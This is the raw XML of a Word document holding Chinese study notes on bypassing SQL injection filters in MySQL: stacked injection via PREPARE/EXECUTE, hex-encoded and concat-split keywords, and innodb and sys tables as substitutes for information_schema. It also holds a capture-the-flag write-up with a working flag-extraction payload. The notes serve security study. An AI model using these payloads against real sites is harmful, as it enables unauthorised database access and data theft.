        <w:t>^(length(database())=1)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来判断^后的真值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846320" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="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空代表后面的值为真</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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In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利用mysql中的in用法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In(value1, value2,......)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//表示查询in括号中范围的内容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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from nisa where id in(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3444240" cy="1165860"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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863340" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6)堆叠注入中的预编译处理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预编译的优势在于:一次编译,多次执行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堆叠注入因为可以执行多个语句 , 用预编译处理再合适不过了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">传参: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">; set @x=0x31; PREPARE a from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from nisa where id=?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;EXECUTE a using @x;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预定义处理语句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PREPARE 变量名 from 语句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//语句中可使用问号,问号表示一个字符串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执行语句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EXECUTE 变量名 using 字符串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//using字符串可以省略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删除定义语句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{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DEALLOCATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> | DROP } PREPARE 变量名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堆叠注入中select被过滤时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0x十六进制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将查询语句转为十六进制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;set @x=0x73656c6563742a66726f6d206e697361;PREPARE bi from @x;EXECUTE bi;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0x73656c6563742a66726f6d206e697361是select*from nisa的十六进制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137660" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="7620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6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Concat()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Concat直接将select拆开再拼接就好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例题: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[2019强网杯 随便注]WP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先利用order by判断出列数为2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4366260" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="762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再利用联合注入找回显点,发现select被ban了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023110"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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这种框一看就像堆叠,尝试堆叠注入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587240" cy="4785360"/>
            <wp:effectExtent l="0" t="0" r="0" b="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查看列名:show columns from `1919810931114514`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3657600" cy="5623560"/>
            <wp:effectExtent l="0" t="0" r="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62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利用预编译加concat()获取flag的值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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1';set @x=concat('s','elect',' flag from `1919810931114514`');PREPARE a from @x;EXECUTE a;#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801110"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7)information过滤绕过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join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在已知表名的情况下可以利用join来无列名注入(无过滤那篇已经讲了,这里不再介绍)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Innodb 引擎(MySQL&gt;5.6)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从5.5.8开始, innodb成为了MySQL的默认存储引擎.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在5.6以上的版本,innodb增加了两张表: innodb_index_stats , innodb_table_stats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这两张表存储了数据库和数据表的信息,不过并没有存储列名信息,下面从phpmyadmin的视图观察这两个表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首先为了测试, 在bilala库下新创了一个5.7_test表,引擎设置为innodb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590675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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去mysql.innodb_index_stats下查看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716405"/>
            <wp:effectExtent l="0" t="0" r="7620" b="571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可以发现库名与对应的表名都在其中,另一张表也是如此</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1985010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1143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由此, 在information被ban的情况下,我们可以尝试用innodb引擎存的信息来查询,得到表名后又可以用无列名注入来得到列名.</w:t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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Sys (MySQL&gt;=5.7)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Sys库中的sys.schema_table_statistics_with_buffer、sys.schema_auto_increment_columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>两张表存储了库名表名, 在information被ban时可以替代information.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介绍这两个表之前,我们先要知道自增id, 顾名思义就是如果一个字段设置了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auto_increment, 那这个字段就会在生成新记录时自动增加对应的值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举个栗子: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我先给i_am_test表中的id设置auto_increment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1908810"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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注意现在的id到4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3978275"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1460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7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我们去插入一条新纪录(此处故意不设置id的值)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684020"/>
            <wp:effectExtent l="0" t="0" r="6350" b="762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执行后发现id被自动填充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4495800"/>
            <wp:effectExtent l="0" t="0" r="13970" b="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我们再用同样的操作去nisa中添加记录 (nisa表的id没有自增) , 发现报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3032125"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635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jc w:val="left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说完自增, 接下来介绍sys.schema_table_statistics_with_buffer和sys.schema_auto_increment_columns两个表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看名字就知道schema_auto_increment_columns存的是有设置自增的表,另一个就是存没设置的,下面在phpmyadmin视图下查看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首先查看schema_auto_increment_columns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488565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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发现设置了自增的id字段及其对应的表名库名都在其中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再看看另一个表sys.schema_auto_increment_columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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这里有i_am_test是因为这个表中除了id是自增, 还有两个字段是非自增的, 可以发现这里面也记录了表名及其对应的库名, 没有列名, 同样接下来的步骤就是无列名注入了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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8)常用替代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* sleep()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==&gt;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benchmark()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and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==&gt;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&amp;&amp;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or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==&gt;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||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xor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==&gt;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|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当数字被过滤时,可以使用数字的替代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80"/>
        <w:gridCol w:w="21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tcW w:w="218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代替字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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false、!pi()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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true、!(!pi())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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true+true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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floor(pi())、~~pi()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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ceil(pi())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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tcW w:w="218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floor(version())</w:t>
            </w:r>
          </w:p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//这里注意版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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218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ceil(version())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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218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ceil(pi()+pi())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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218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floor(version()+pi())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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218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floor(pi()*pi())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="218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200400" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="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583180" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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A59A79"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A3A59A79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44DDA2D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D44DDA2D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E152FA0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E152FA0E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17AF89F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17AF89F6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5AD9066A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AD9066A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60C54883"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60C54883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6CDF4286"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CDF4286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3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6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544132"/>
    <w:rsid w:val="02C14490"/>
    <w:rsid w:val="033527F8"/>
    <w:rsid w:val="120F49A0"/>
    <w:rsid w:val="15654489"/>
    <w:rsid w:val="1707190E"/>
    <w:rsid w:val="1B726BEB"/>
    <w:rsid w:val="20E36C4C"/>
    <w:rsid w:val="2BCC149D"/>
    <w:rsid w:val="2F51425B"/>
    <w:rsid w:val="2F6A2CD3"/>
    <w:rsid w:val="31D448A9"/>
    <w:rsid w:val="358826FA"/>
    <w:rsid w:val="44B976E0"/>
    <w:rsid w:val="47F115CF"/>
    <w:rsid w:val="5DBD5131"/>
    <w:rsid w:val="6AA30A61"/>
    <w:rsid w:val="6D062D41"/>
    <w:rsid w:val="70D26D64"/>
    <w:rsid w:val="79E46056"/>
    <w:rsid w:val="7F5B2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2021-08-22T05:05:00Z</dcterms:created>
  <dc:creator>bilala</dc:creator>
  <cp:lastModifiedBy>哔啦啦</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-24T06:47:39Z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7EFBDFB0C56B44F1BA5EB9C6BDDA20E5</vt:lpwstr>
  </property>
</Properties>
</file>